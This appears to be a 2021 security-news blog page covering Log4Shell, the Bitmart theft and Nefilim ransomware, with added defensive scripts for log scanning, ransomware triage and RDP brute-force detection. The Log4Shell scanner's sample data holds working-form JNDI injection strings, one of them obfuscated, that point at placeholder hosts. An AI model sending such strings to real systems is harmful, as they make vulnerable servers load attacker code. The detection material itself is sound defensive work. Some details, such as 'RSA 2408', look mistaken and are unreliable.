Friday, December 17, 2021

Popular Log4j Software Poses a Very Big Risk, First Spotted in Minecraft

A gaping security vulnerability has been found in the Log4j software, a very popular library used by millions of web servers. The vulnerability is open to attack, and teams around the world are racing to patch systems that could be affected before malicious hackers can exploit them.

“The world of the internet is buzzing right now,” said Adam Meyers of cybersecurity firm CrowdStrike.

The problems with Log4j were first recognized in the video game Minecraft, and it was quickly realized that their impact was much broader. The software is used in millions of web applications, including Apple's iCloud. According to CrowdStrike records, the attacks that have already started exploiting this bug, known as Log4Shell attacks, "have been happening since last December 9th."

The director of the US Cybersecurity and Infrastructure Security Agency, Jen Easterly, said the security hole poses a "severe risk" to the internet. "This vulnerability, which is being widely exploited by certain actors who are creating threats, represents a very urgent challenge for defenders of this already widespread internet network," said Easterly.

The following points explaining the ongoing threat are quoted from New Scientist, Monday, December 13, 2021:

What is Log4j?

Almost all software keeps a record of errors and other important events, known as logs. Instead of building their own logging system, many software developers use the open source Log4j, which makes it one of the most widely used logging packages in the world.

It is this popularity of Log4j that is now turning the heads of cybersecurity experts worldwide. Its exposed security vulnerability affects millions of pieces of software running on millions of machines that we all interact with.

What does the open security gap let hackers do?

Attackers can trick Log4j into running malicious code by getting it to save a log entry that contains a specially crafted string of text. How hackers get that string into a log varies from program to program. In the Minecraft case, the route is the chat box: a log entry is written to archive every message, so if a malicious string of text is sent from one user to another, that text is embedded in the log.

In another case, Apple's servers were found to create a log entry recording the name a user assigns to an iPhone in its settings. From such a log entry, attackers can run whatever code they want on the server, for example to steal or delete sensitive data.
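As an added illustration of the defensive side of the mechanism just described (this is example code written for this page, not code from the article, New Scientist, Apache or any vendor), the script below scans log lines for the JNDI lookup string that the Log4Shell bug acts on. The sample log lines, the IP addresses in them and the function names are all constructed for the example. It goes slightly beyond the text by first collapsing the simple nested-lookup obfuscations that public detection guidance warns about, so that a single pattern can match both plain and disguised lookups.

```python
import re

# Constructed sample log lines (not taken from the article). Lines 2, 3 and 5
# contain a JNDI lookup string; line 3 disguises it with nested lookups.
SAMPLE_LOG_LINES = [
    '[12:01:03] [Server thread/INFO]: <steve> hello everyone',
    '[12:01:09] [Server thread/INFO]: <alex> ${jndi:ldap://192.0.2.10:1389/a}',
    '[12:02:11] [Server thread/INFO]: <alex> ${${lower:j}ndi:${lower:l}dap://192.0.2.10/x}',
    '203.0.113.5 - - [13/Dec/2021:10:00:00 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    'device_name=${jndi:rmi://192.0.2.11/o}',
]

# ${lower:X} / ${upper:X} lookups that evaluate to a single character or word.
NESTED = re.compile(r'\$\{(lower|upper):([^${}]*)\}', re.IGNORECASE)
# ${anything:-value} default-value lookups, which evaluate to "value".
DEFAULT_VALUE = re.compile(r'\$\{[^${}]*?:-([^${}]*)\}')
# The lookup that matters: ${jndi:<scheme>:...}
JNDI = re.compile(r'\$\{\s*jndi\s*:\s*([a-z]+)\s*:', re.IGNORECASE)


def _resolve_case(match: re.Match) -> str:
    """Replace ${lower:x}/${upper:x} with the text it evaluates to."""
    keyword, value = match.group(1).lower(), match.group(2)
    return value.lower() if keyword == 'lower' else value.upper()


def normalize(text: str, max_rounds: int = 10) -> str:
    """Collapse nested lookups repeatedly until the string stops changing."""
    for _ in range(max_rounds):
        new = NESTED.sub(_resolve_case, text)
        new = DEFAULT_VALUE.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def scan_log_lines(lines):
    """Return one hit per line that carries a JNDI lookup after normalization."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = JNDI.search(normalize(line))
        if match:
            hits.append({'line': number, 'scheme': match.group(1).lower(), 'raw': line})
    return hits


if __name__ == '__main__':
    for hit in scan_log_lines(SAMPLE_LOG_LINES):
        print(f"line {hit['line']}: jndi scheme={hit['scheme']} :: {hit['raw']}")
```

In practice the same function would be pointed at application, chat or web server logs, and any hit is a reason to check whether the host that wrote the line runs a Log4j version still affected by the bug.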

Why was this weakness only discovered recently?

The code behind open source software can be viewed, run and even edited by anyone. This transparency can make the software more robust and secure, because many pairs of eyes are on it. However, no software can be guaranteed to be 100 percent safe.

The code that enables the Log4Shell attack has been around for a long time, but was only discovered last month by a cybersecurity researcher at the Chinese computing firm Alibaba Cloud. The researcher immediately reported it to the Apache Software Foundation, a non-profit organization in America that oversees hundreds of open source projects including Log4j, to give it a chance to fix the flaw before it was made public.

So what is the current threat status?

Apache gave this vulnerability a 'very important' priority and rapidly developed a fix. Now hundreds of thousands of IT teams are scrambling to update Log4j to version 2.15.0. IT teams still also have to clean their code of potential exposure and keep an eye out for attempted attacks.

It's worth noting that a security patch may arrive quickly, but it usually takes time for everyone to apply it. Computer and network services are now very complex, layered with levels of abstraction and code, so it can take months to update all of an organization's services.

And there are always those who do nothing at all, leaving outdated hardware and unpatched code that hackers can easily exploit.

Thursday, December 16, 2021

Crypto Exchange Robbed by Hackers, US$196 Million in Tokens Taken Away

Cryptocurrency exchange Bitmart was hacked. Blockchain security and data analysis company Peckshield estimates the loss at US$196 million, equivalent to Rp 2.8 trillion (at an assumed exchange rate of Rp 14,300 per US dollar).

Meanwhile, Bitmart confirmed the hack in an official statement and wrote that the hacker withdrew about US$150 million in assets. This is adapted by detikcom from CNBC, Monday (6/12/2021).

Bitmart added in a statement that all withdrawals have been temporarily suspended until further notice, and it is reviewing security thoroughly.

Peckshield was the first to spot the irregularities on Saturday, noting that one of Bitmart's addresses showed steady outflows of tens of millions of dollars to an address Etherscan called "Bitmart Hackers."

Peckshield estimates that Bitmart lost around $100 million in various cryptocurrencies on the Ethereum blockchain and another $96 million in coins on Binance Smart Chain. The hackers got away with more than 20 tokens, including Binance, SafeMoon, and Shiba Inu coins.

Bitmart said the affected Ethereum and Binance Smart Chain "hot wallets" held only a small percentage of the exchange's assets, and that all other wallets are safe.

CNBC has sought to reach out to several Bitmart employees to ask for more clarity about the hack, including whether customer funds were specifically targeted in the breach, and if so whether users would be compensated.

CNBC has yet to receive a response, but an email to the office address of Bitmart founder and CEO Sheldon Xia returned with a message that read, "Recipient address denied: Access denied."

Bitmart said it was still unclear what method the hackers might have used, but what happened after the breach was fairly straightforward, according to Peckshield. According to the security firm, it's a classic case of transfer-out, swap, and wash.

After transferring funds out of Bitmart, the hacker apparently used a decentralized exchange aggregator known as 1inch to swap the stolen tokens for ether. From there, the ether was deposited into a privacy mixer known as Tornado Cash, which makes the money harder to track.

Hackers Use Log4Shell Bug to Roll Out Cyber Attacks Around the World

Hackers have used the Log4Shell vulnerability in Apache Log4j's Java-based logging platform to carry out potentially worldwide malware attacks.

Apache is a web server that runs on many operating systems and is used to serve and run websites. The web, or WWW, is accessed over the HTTP protocol.

The Bleeping Computer report says the Log4Shell vulnerability lets attackers remotely execute commands on a vulnerable server by getting it to log a specially crafted string, for example by setting the browser's request to that string.

Malicious actors can exploit the Log4Shell vulnerability to execute scripts that download and install various types of cryptominers.

Netlab 360 researchers report that threat actors have exploited the vulnerability to install the Mirai and Muhstik malware on affected devices.

These malware families recruit IoT devices and servers into botnets and use them to deploy cryptominers and run large-scale DDoS attacks.

A report from Microsoft Threat Intelligence says the Log4j vulnerability was also exploited to deploy Cobalt Strike. Cobalt Strike is used to attack devices, perform remote network reconnaissance, and carry out further commands.

For this reason, everyone running servers with Log4j is urged to install the latest version of Log4j, or the latest version of the applications that use it, as soon as possible.

Nefilim Ransomware, Successor to Nemty Ransomware

In 2020 many companies around the world fell victim to the “Nefilim” ransomware. One of them was the Australian logistics and transportation company Toll Group, whose business operations were disrupted.

The company is often used by e-commerce giants like eBay to transport bulk commodities, essential parts and medical supplies.

When Toll Group refused to pay the demanded ransom, the Nefilim gang leaked 200 gigabytes (GB) of stolen data. The data consisted of detailed employee information, including invoices for medical examination results and financial reports.

How does Nefilim infect victims?

According to the Japanese cybersecurity company Trend Micro (accessed Wednesday, 28 April 2021), Nefilim is one of the ransomware families that uses double-extortion tactics, like the Maze ransomware gang.

Nefilim not only encrypts the victim's computer data and demands a ransom; if the victim refuses to pay the requested ransom, the hackers threaten to release the stolen company data.

The ransomware was first discovered in March 2020. Trend Micro believes it is an evolution of the “Nemty” ransomware because it has several similarities.

The Nefilim code has many important similarities with Nemty 2.5; the main difference is that Nefilim has removed the Ransomware-as-a-Service (RaaS) component. Its operators also handle payments via email communication rather than through a Tor payment website.

For initial access, Nefilim operators take advantage of various ways to spread their malware. They exploit vulnerabilities in the Remote Desktop Protocol (RDP) or the Citrix vulnerability (CVE-2019-19781) and use brute force attacks to break into victim systems.

“Nefilim also uses other tools to collect credentials, such as Mimikatz, LaZagne, and NirSoft's NetPass. Stolen credentials were used to reach the server,” Trend Micro wrote.

After successfully entering the victim's system, the operators start running their components, such as anti-antivirus tools, exfiltration tools, and finally Nefilim itself.

The hackers use several legitimate tools for lateral movement, that is, spreading through the victim's systems. For example, they use PsExec or Windows Management Instrumentation (WMI) to drop and run other components, including the ransomware itself.

Nefilim was observed using batch files to terminate certain processes and services, and even third-party tools such as PC Hunter, Process Hacker, and Revo Uninstaller to terminate antivirus-related processes, services, and applications. It also uses AdFind, BloodHound, or SMBTool to identify Active Directory and machines joined to the domain.

One of the most important aspects of Nefilim is its data exfiltration capability. Researchers observed Nefilim copying data from servers or shared directories to local directories and archiving it with 7-Zip. It then uses MEGAsync to exfiltrate the victim's data.

Meanwhile, to encrypt victim data, Nefilim uses AES-128. The AES encryption key is then itself encrypted with an RSA 2408 public key.

Therefore, to decrypt a locked file it is necessary to obtain the attacker's RSA private key. Nefilim appends the .NEFILIM extension to the name of every encrypted file as a marker; for example, a file named 1.doc becomes 1.doc.NEFILIM.

According to the Indonesian National Cyber and Crypto Agency (BSSN), once the encryption process is complete the operators drop a ransom note file named NEFILIM-DECRYPT.txt throughout the system. The file contains instructions on how to contact the operators, as well as data breach threats to pressure the victim if the ransom is not paid within seven days.

The note also provides links to the website the attackers use to leak victim data.
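The markers described above (the .NEFILIM extension, the NEFILIM-DECRYPT.txt note, and the local staging of 7-Zip archives before exfiltration) are what an incident responder looks for first. The script below is an added example written for this page, not code from Trend Micro, BSSN or the original article: it builds a throwaway directory that imitates a hit file share (constructed sample, no real malware involved), then walks it read-only and reports which files were encrypted, what their original names were, where ransom notes landed, and which archives look like exfiltration staging. The directory layout, file names and function names are all assumptions for the example.

```python
import tempfile
from pathlib import Path

ENCRYPTED_EXT = '.NEFILIM'            # marker appended to every encrypted file (from the article)
RANSOM_NOTE = 'NEFILIM-DECRYPT.txt'   # ransom note dropped throughout the system (from the article)
ARCHIVE_EXTS = {'.7z', '.zip', '.rar'}  # staging archives worth a look (7-Zip is named in the article)


def triage_tree(root):
    """Walk a tree read-only and summarize Nefilim indicators found in it."""
    root = Path(root)
    encrypted, notes, archives, untouched = [], [], [], []
    for path in sorted(root.rglob('*')):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        if path.name == RANSOM_NOTE:
            notes.append(rel)
        elif path.name.endswith(ENCRYPTED_EXT):
            encrypted.append(rel)
        elif path.suffix.lower() in ARCHIVE_EXTS:
            archives.append(rel)
        else:
            untouched.append(rel)
    # Directories that hold either an encrypted file or a note: the blast radius.
    affected_dirs = sorted({Path(p).parent.as_posix() for p in encrypted + notes})
    return {
        'encrypted_files': encrypted,
        'original_names': [p[:-len(ENCRYPTED_EXT)] for p in encrypted],
        'ransom_notes': notes,
        'staged_archives': archives,
        'affected_dirs': affected_dirs,
        'untouched_files': untouched,
    }


def build_constructed_sample():
    """Create a temporary tree imitating a hit share. Everything here is constructed."""
    root = Path(tempfile.mkdtemp(prefix='nefilim-triage-'))
    (root / 'finance').mkdir()
    (root / 'hr').mkdir()
    (root / 'temp').mkdir()
    (root / 'finance' / '1.doc.NEFILIM').write_bytes(b'\x00' * 16)
    (root / 'finance' / RANSOM_NOTE).write_text('constructed note, not a real ransom note')
    (root / 'hr' / 'payroll.xlsx.NEFILIM').write_bytes(b'\x00' * 16)
    (root / 'hr' / RANSOM_NOTE).write_text('constructed note, not a real ransom note')
    (root / 'temp' / 'export.7z').write_bytes(b'7z\xbc\xaf\x27\x1c')  # 7-Zip magic bytes only
    (root / 'readme.txt').write_text('not encrypted')
    return root


if __name__ == '__main__':
    report = triage_tree(build_constructed_sample())
    for key, value in report.items():
        print(f'{key}: {value}')
```

Run against a real share the function only reads file names, so it is safe to use on a machine that has not yet been imaged; the list of original names is what you hand to whoever checks the most recent clean backups.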

How to prevent Nefilim?

BSSN said that in several cyber incidents Nefilim was executed only after the attacker had managed to get into the victim's network, at which point the attacker could also retrieve the data.

If you become a victim of a Nefilim attack, BSSN recommends that the company does not pay the ransom because the attacker will still have access to the data even if the company pays the ransom.

Here are some steps that can be used as an effort to prevent Nefilim ransomware:

  1. Close unused RDP ports. If it is not possible to close it, limit the source addresses that can access the port.
  2. Configure the settings to ensure that only authorized users can gain access as RDP admins. For RDP administrator accounts, use a strong password and multi-factor authentication (MFA).
  3. Perform network monitoring for signs of an attack.
  4. Limit the number of failed login attempts to prevent unauthorized logins.
  5. Use spam filters and antivirus to detect and filter out malicious emails.
  6. Always make sure your computer gets the latest patches and updates.
  7. Scan your computer using an antivirus with the latest updates.
  8. Always enable the firewall on the computer.
  9. Back up data periodically to external storage media.
  10. Turn off file sharing if not needed. If file sharing is required, we recommend using ACLs and passwords to restrict access. Disable anonymous access for shared folders.
  11. Do not open suspicious emails and be wary of any links received.
  12. Do not download or use cracked or pirated software.
  13. Be careful with external devices connected to the computer and when installing free programs downloaded from the internet.
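Steps 3 and 4 above (monitor for signs of attack, limit failed logins) are aimed squarely at the RDP brute forcing that the Trend Micro section describes as one of Nefilim's initial-access routes. The following is an added example for this page, not BSSN's or Trend Micro's code: it runs a simple sliding-window detector over a handful of constructed records shaped like Windows Security log entries (event 4625 = failed logon, 4624 = successful logon, logon type 10 = RemoteInteractive, i.e. RDP) and raises an alert for any source address that fails often enough inside the window, noting whether a successful RDP logon from that source followed. The IP addresses, user names, timestamps and thresholds are all constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

FAILED_LOGON, SUCCESS_LOGON = 4625, 4624   # Windows Security event IDs
RDP_LOGON_TYPE = 10                         # RemoteInteractive (RDP)


def _ev(time, event_id, logon_type, user, src_ip):
    return {'time': time, 'event_id': event_id, 'logon_type': logon_type,
            'user': user, 'src_ip': src_ip}


# Constructed sample records (not from any real log). 198.51.100.7 sprays six
# passwords in under three minutes and then gets in; 203.0.113.9 is a user who
# mistyped twice; 10.0.0.5 fails on the local console, which is not RDP at all.
SAMPLE_EVENTS = [
    _ev('2021-04-28T02:00:01', FAILED_LOGON, RDP_LOGON_TYPE, 'administrator', '198.51.100.7'),
    _ev('2021-04-28T02:00:25', FAILED_LOGON, RDP_LOGON_TYPE, 'admin', '198.51.100.7'),
    _ev('2021-04-28T02:00:50', FAILED_LOGON, RDP_LOGON_TYPE, 'administrator', '198.51.100.7'),
    _ev('2021-04-28T02:01:20', FAILED_LOGON, RDP_LOGON_TYPE, 'backup', '198.51.100.7'),
    _ev('2021-04-28T02:01:55', FAILED_LOGON, RDP_LOGON_TYPE, 'administrator', '198.51.100.7'),
    _ev('2021-04-28T02:02:30', FAILED_LOGON, RDP_LOGON_TYPE, 'administrator', '198.51.100.7'),
    _ev('2021-04-28T02:03:10', SUCCESS_LOGON, RDP_LOGON_TYPE, 'administrator', '198.51.100.7'),
    _ev('2021-04-28T08:15:00', FAILED_LOGON, RDP_LOGON_TYPE, 'jsmith', '203.0.113.9'),
    _ev('2021-04-28T08:15:30', FAILED_LOGON, RDP_LOGON_TYPE, 'jsmith', '203.0.113.9'),
    _ev('2021-04-28T08:16:00', SUCCESS_LOGON, RDP_LOGON_TYPE, 'jsmith', '203.0.113.9'),
] + [
    _ev(f'2021-04-28T09:00:{s:02d}', FAILED_LOGON, 2, 'kiosk', '10.0.0.5') for s in range(0, 60, 10)
]


def detect_rdp_brute_force(events, threshold=5, window=timedelta(minutes=10)):
    """Alert on sources with >= threshold failed RDP logons inside any `window`."""
    failures, successes = defaultdict(list), defaultdict(list)
    for e in events:
        if e['logon_type'] != RDP_LOGON_TYPE:
            continue                                   # only RDP logons matter here
        when = datetime.fromisoformat(e['time'])
        if e['event_id'] == FAILED_LOGON:
            failures[e['src_ip']].append((when, e['user']))
        elif e['event_id'] == SUCCESS_LOGON:
            successes[e['src_ip']].append(when)

    alerts = []
    for ip, fails in failures.items():
        fails.sort()
        times = [t for t, _ in fails]
        start = 0
        for end in range(len(times)):                  # sliding window over sorted failures
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                first, last = times[start], times[end]
                followed = any(first <= s <= last + window for s in successes.get(ip, []))
                alerts.append({
                    'src_ip': ip,
                    'failed_attempts': len(times),
                    'users': sorted({u for _, u in fails}),
                    'success_after_failures': followed,   # the case to escalate immediately
                })
                break
    return alerts


if __name__ == '__main__':
    for alert in detect_rdp_brute_force(SAMPLE_EVENTS):
        print(alert)
```

The threshold and window are deliberately parameters: an account lockout policy (step 4) decides how many guesses are possible, and the detector should fire well before that limit so that a source which is being locked out repeatedly is still visible. An alert whose `success_after_failures` is true is the one that warrants pulling the session and checking for the credential-dumping and discovery tools named earlier.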